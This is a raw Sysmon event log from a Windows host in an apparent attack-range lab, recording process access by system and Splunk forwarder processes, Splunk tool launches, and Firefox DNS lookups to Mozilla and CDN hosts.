10341000x800000000000000018420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.687{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-94CC-6005-4B05-00000000A301}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.687{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94CC-6005-4B05-00000000A301}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.688{59A5CD1D-94CC-6005-4B05-00000000A301}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.171{59A5CD1D-94CC-6005-4A05-00000000A301}68965208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.015{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94CC-6005-4A05-00000000A301}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.015{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-94CC-6005-4A05-00000000A301}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.015{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94CC-6005-4A05-00000000A301}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.016{59A5CD1D-94CC-6005-4A05-00000000A301}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.738{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94CD-6005-4C05-00000000A301}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.736{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.736{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.736{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.736{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.736{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-94CD-6005-4C05-00000000A301}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.735{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94CD-6005-4C05-00000000A301}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.735{59A5CD1D-94CD-6005-4C05-00000000A301}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:59.602{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000018434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:59.602{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.798{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net02600:9000:2070:fc00:a:da5e:7900:93a1;2600:9000:2070:0:a:da5e:7900:93a1;2600:9000:2070:2600:a:da5e:7900:93a1;2600:9000:2070:2a00:a:da5e:7900:93a1;2600:9000:2070:d400:a:da5e:7900:93a1;2600:9000:2070:d800:a:da5e:7900:93a1;2600:9000:2070:de00:a:da5e:7900:93a1;2600:9000:2070:e400:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.784{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net0143.204.94.19;143.204.94.69;143.204.94.117;143.204.94.14;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.783{59A5CD1D-945A-6005-3305-00000000A301}7052content-signature-2.cdn.mozilla.net0type: 5 d2nxq2uap88usk.cloudfront.net;::ffff:143.204.94.14;::ffff:143.204.94.19;::ffff:143.204.94.69;::ffff:143.204.94.117;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.752{59A5CD1D-945A-6005-3305-00000000A301}7052a19.dscg10.akamai.net02a02:26f0:10::5c7a:d693;2a02:26f0:10::5c7a:d691;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.749{59A5CD1D-945A-6005-3305-00000000A301}7052a19.dscg10.akamai.net023.55.161.211;23.55.161.185;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.748{59A5CD1D-945A-6005-3305-00000000A301}7052ciscobinary.openh264.org0type: 5 a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com;type: 5 a17.rackcdn.com;type: 5 a17.rackcdn.com.mdc.edgesuite.net;type: 5 a19.dscg10.akamai.net;::ffff:23.55.161.185;::ffff:23.55.161.211;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.644{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com013.227.156.17;13.227.156.19;13.227.156.108;13.227.156.119;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.643{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com0::ffff:13.227.156.119;::ffff:13.227.156.17;::ffff:13.227.156.19;::ffff:13.227.156.108;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.535{59A5CD1D-945A-6005-3305-00000000A301}7052prod.balrog.prod.cloudops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.505{59A5CD1D-945A-6005-3305-00000000A301}7052prod.balrog.prod.cloudops.mozgcp.net035.244.181.201;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.504{59A5CD1D-945A-6005-3305-00000000A301}7052aus5.mozilla.org0type: 5 balrog-aus5.r53-2.services.mozilla.com;type: 5 prod.balrog.prod.cloudops.mozgcp.net;::ffff:35.244.181.201;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:01.227{59A5CD1D-8E56-6005-2E00-00000000A301}2464185.161.55.23.in-addr.arpa.0type: 12 a23-55-161-185.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:01.225{59A5CD1D-8E56-6005-2E00-00000000A301}2464206.21.217.172.in-addr.arpa.0type: 12 fra16s12-in-f14.1e100.net;type: 12 fra16s12-in-f206.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000018455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.931{59A5CD1D-945A-6005-3305-00000000A301}7052r3.sn-4g5edns7.gvt1.com02a00:1450:4001:68::8;C:\Program Files\Mozilla 